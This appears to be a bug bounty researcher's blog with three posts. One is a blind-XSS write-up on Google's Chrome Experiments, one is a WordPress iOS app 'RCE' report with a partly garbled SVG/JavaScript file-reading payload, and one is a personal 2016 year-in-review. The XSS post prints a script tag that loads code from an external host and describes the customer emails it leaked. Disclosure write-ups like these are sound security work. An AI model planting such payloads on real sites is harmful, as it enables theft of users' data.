Friday, August 03, 2018

Blind-XSS in Chrome Experiments - Google (Write Up)

Hello Everyone,

In this article, I will show you how I found a blind-XSS vulnerability that leads into Information Disclosure in one of Google's owned product which is the Chrome Experiments (

Back in June last year while looking for Google bug bounty related write up, I found a video proof of concept on youtube about a Cross Site Scripting vulnerability on one of the Google owned product, the Chrome Experiments ( on the description of his video PoC, he didn't mention if the bug was awarded or not so I decided to hunt on the same domain. I fired up my sublist3r just to check if there's any interesting subdomains and found an interesting one which is On the subdomain, I found a Cross Site Scripting vulnerability and reported it to the Google VRP which ends up getting duplicate.

XSS in [Duplicate]

So long story short, I found a blind-XSS on which is also related to on the new target, I found an interesting page which is On my first test, I tried to look up for some XSS and nothing was found. after a few minutes of testing, I decided to fire up my XSSHunter account to test for a blind-XSS, on the new target page, I fill up the form with some blind-XSS payload and submitted it to the server but I didn't receive any successful email about my payload 'til the next few weeks since I submitted. but fortunately, On the 30th of August, few months later after I submitted my payload. I received an email from XSSHunter saying that one of my payload fired up!

But at first place, the XSSHunter email is very confusing since it didn't even give me any hint where it came from but after a few hours of investigation, I found a hint on the param "DOM" on XSSHunter logs. I noticed that XSSHunter throws some interesting information from the Chrome Experiments. Hundreds of personal emails and private messages from the customers and I also found my test submission on the logs, that's where I remember what target page I submitted my blind-XSS payload.

So below is the Proof of Concept I submitted to Google Security Team.

    Report details:

    ID: 5-64xxxxxxxxxxx

    1. Goto and register
    2. Goto
    3. In the "Submit your experiment" form, input your blind XSS payload. my payload was ("><script src=https://<redacted>></script>)
    4. Click Submit.

    If the admin of will open the admin panel to check the submissions, the blind XSS payload will fire on and you will received an email from XSSHunter that your payload fired on

    Attack scenario:
    This issue is not just blind-XSS. in the logs that was emailed to me from XSSHunter, it leaks some hundreds of different email addresses from the Chrome Experiments customers who submitted to them.

    Check this link for the logs that was emailed to me from XSSHunter about the Chrome Experiments: http://<redacted>/chromeexperimentspoc.html

    In the logs, there some email address leak from the Chrome Experiments customers which results to Information Disclosure.

    PS: it took me a months before I received an email from XSSHunter that my payload from Chrome Experiments fired on their side, because maybe the admin from Chrome Experiments logged in to the admin panel of the chrome experiments the other day and opens the submission page.

    I hope you understand



Reported: Friday, September 1, 2017 at 1:27 AM
Triaged: Friday, September 1, 2017 at 6:52 PM
Nice Catch: Monday, September 4, 2017 at 9:04 PM
Awarded: Thursday, September 7, 2017 at 1:17 AM ($100)
Fixed: ----

Shoutout to @IAmMandatory for the awesome XSSHunter tool.

I hope you enjoy this short story and write up.

"The biggest adventure you can take is to live the life of your dreams"
~Oprah Winfrey

Wednesday, February 21, 2018

[RCE] Remote Code Execution in Wordpress iOS Application (version 9.3)

Hello Everyone,

This article will show you how I found a Remote Code Execution Vulnerability in Wordpress iOS Application version 9.3 on my iPod Touch (iOS version 9.3.5). 

It was a cold thursday night of February 15 when I was looking for a good program to spend my night with. While checking on Hackerone's hacktivity page, I found some good stuffs to read and found out that Wordpress have some newly disclosed reports which gives me a motivation to spend my night on their program.

I fired up my sublist3r to check if there some good subdomains to hunt. after few hours of looking for some vulnerabilities on different subdomains and directories, I didn't find even one so I go to my inbox and check my previous reports on Wordpress. I noticed that I have reported an issue which I found on Wordpress iOS app a year ago.

My previous report gives me another idea so I downloaded the Wordpress iOS app again on my iPod Touch which is stuck on iOS version 9.3.5 since Apple didn't release an update anymore. while downloading the app, it says that the new version of the app is not compatible with my iOS version so I need to download the previous/older version of the app that is compatible for my device. So I download the Wordpress iOS app version 9.3 which is the recommended version from app store for device.

After downloading the app, I found some XSS issues but didn't reported it since it was just a self-XSS. after a few hours of having fun with the app, I found this Remote Code Execution vulnerability on the editor of the app. so below is the proof of concept I reported to wordpress.

Proof of Concept


I found out that Wordpress IOS Application has a Remote Code Execution when posting a blog via IOS Application.

Tested in IOS 9.3.5

Injected Payload

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="">


function readTextFile(file)


var rawFile = new XMLHttpRequest();"GET", file, false);

rawFile.onreadystatechange = function ()


if(rawFile.readyState === 4)


if(rawFile.status === 200 || rawFile.status == 0)


var allText = rawFile.responseText;









  1. Login to your Wordpress account using Wordpress IOS Application
  2. Create a new blog post
  3. In the Post body tap the <> button then input the given payload.
  4. tap the <> button again and see the result.

I hope you will fix this issue as soon as possible.
Cheers and have a good day,



Reported: February 15, 2018 
First Response: February 15, 2018 
Second Response (Marked as Needs more information): February 15, 2018 
Third Response (Marked as Informative): February 21, 2018   
Final Response (Hi. Sure, please feel free to publish it on your blog if you'd like.): February 21, 2018   

I hope you enjoy this article.

Life is a journey that must be traveled no matter how bad the roads and accommodations. Oliver Goldsmith
Read more at:
"Life is a journey that must be traveled no matter how bad the roads and accommodations."
~ Oliver Goldsmith
Life is a journey that must be traveled no matter how bad the roads and accommodations. Oliver Goldsmith
Read more at:
Life is a journey that must be traveled no matter how bad the roads and accommodations. Oliver Goldsmith
Read more at:

Monday, December 05, 2016

2016 Year in Review

2016 Year in Review

Hello Everyone,

This year, I would like to end my 2016 with a Year in Review.

2016; Another wonderful year in my life, lots of awesome, amazing and memorable things happened. Lots of failure, successful stuffs and etc... So, as the year comes to an end, here are the things that happened in my 2016 journey.


1. Travels, lot's of traveling stuff happened this year although not outside of Mindanao but still, one of favorite things that I've done this year. Traveling and meeting new people and cultures is one of my main life goals.

This year, I traveled to Pagadian City, Zamboanga City, Dipolog City, Dapitan City (It was my first time in Dapitan, such a lovely place.) and Baroy, Lanao Del Norte. Hopefully next year, I want to spent some of my bug bounty rewards for another Travel adventure, I already have the list of the places that I want to go.

Here are some of the pictures I took during my travels.

On my way to Dapitan.
Visited Gloria de Dapitan for the first time.
Chillin' at the bench inside Gloria de Dapitan with my homies
Me sitting on the wooden bench inside Jose Rizal's house (Replica)
While waiting for my name to be called at the NBI Office in Pagadian City.
On my way to Baroy, Lanao Del Norte.
Chill morning in Baroy, Lanao.
On my way home from Baroy, took this shot while in Aurora, Zamboanga Del Sur.
On my way to Zamboanga City.
Took a picture of Jose Rizal's house (Replica) in Talisay, Dapitan City.

All in all, my travel adventure this year is such a wonderful experience.


2. The Bug bounty, for the past 4 years in my bug bounty career, I learned a lot of things in the field of Information Technology, meet new friends (some are just in Social Media), Earned some money without having a regular job (just the bug bounty thing), Bought some things that I want using my bug bounty rewards.

I started participating in the bug bounty community mid of 2013, I reported a lot of different security vulnerabilities for hundreds of companies since then. but in 2016, my bug bounty journey is a little bit different from the past years, I become a seasonal researcher since I can't handle my time for it unlike before but still, this year's bug bounty journey is just another wonderful and memorable adventure.

I was acknowledged again by Microsoft for the second time.

Twitter for the third time "two times for this year" (2013, 2014 and 2016) [Write Up of one of the issues I reported this year >> Here].

Discovered a critical vulnerability in Cydia [iOS] (Write Up was here) but decided not to report it.

Discovered a Universal XSS in Comodo Dragon version (Write was here, shout out to Inti De Ceukelaire for this thing).

Acknowledged and rewarded by different companies, can't mention them all but thank you very much to those companies, really stoked to have them become part of my 2016 bug bounty adventure.

Joined the most prestigious "Synack Red Team" community (just another dream come true for me).

Pulled out from the Bugcrowd Top 100 Security Researchers but hopefully before this year will finally end, I will be on the Top 100 again since I made a promise to be to on the Bugcrowd top 100 researchers for 4 years.

Received much bounties from different companies (Thank you bug bounty).

Just like the previous years, participated in some private and flex bug bounty programs and received a bounties from them.

One of my favorite thing in bug bounty, the swags; received a lot of swag from different companies.

Just like before, met new people (specially in social media) some of them become really a friend, some of them are just like the kind of people that think hacker is just a guy who hacks a facebook account (HAHAHA!), some of them are the people who also ask a help on how to start participating bug bounty programs. 

All in all, this years bug bounty adventure is so hype although it's a little bit different from the previous years but still, I managed to make it another year of wonderful bug bounty adventure. Thank you to all the companies specially Bugcrowd, Hackerone, Cobalt and to my new family, the Synack Red Team, words can't describe how happy I am that you guys become part of my another wonderful bug bounty adventure, I hope next year's adventure will be more exciting and interesting.


3. The job opportunities, just like the previous years, I received a lot of job opportunities this year because of my bug bounty career as a security researcher but I decided not to accept them for now since all I want to do first is to enjoy my teenage adventure, enjoy my life as a single person. jobs are everywhere though some say's that opportunities knocks once, I'm not afraid of not accepting those opportunities that was given to me, I remember, there was an article that I read before about why he left the company where he was working, he say's on his blog that he don't want to stick in one company or job, all he want to build his own company and learn and progress more on it.


4. My Adventure with my IBBRC Family, As a BMXer, IBBRC (Ipil Board and Bike Riding Community) is also a big part of this years adventure, we did a lot of filming stuffs, discovered a lot of beautiful spots in our hometown, meet new friends because of riding, lot's of crash and new tricks, better progression for everyone in the team. All in all, I'm so stoked that my IBBRC family have a wonderful part of my 2016 journey, really hype for all my friends in IBBRC.

Here's some of our projects we did for this year:


We filmed a lot this year and hopefully next year, more video edits.


5. My music career, as a EDM Producer, having a family of producers is a dream come true. this year, a friend of mine ask me to join his group of music producers (although the group is not so big enough but I'm happy to become part of it) so that I can promote my tracks easily with them. Although I'm not so active enough on producing EDM tracks since the last few months, Virtous Music still invited me to become part of their group (The group was like a record label), released 4 of my EDM tracks with them. having them become part of my 2016 adventure is one of the happiest moment in my life. Thanks to my Virtous Music family.


6. My Invalid Web Security (IWS) Family, We shared a lots of ideas, I learned a lot from my IWS Family, really happy to have my IWS family become part of my 2016 adventure.

This year, I shared a lot of moments with the people I met, learned a lot from them. They motivate me to progress more for the upcoming years, really happy to have them on this year's adventure.

So, I hope you guys also enjoy your 2016 adventure, Happy Holidays.

"The best way to pay for a lovely moment is to enjoy it." 
-Richard Bach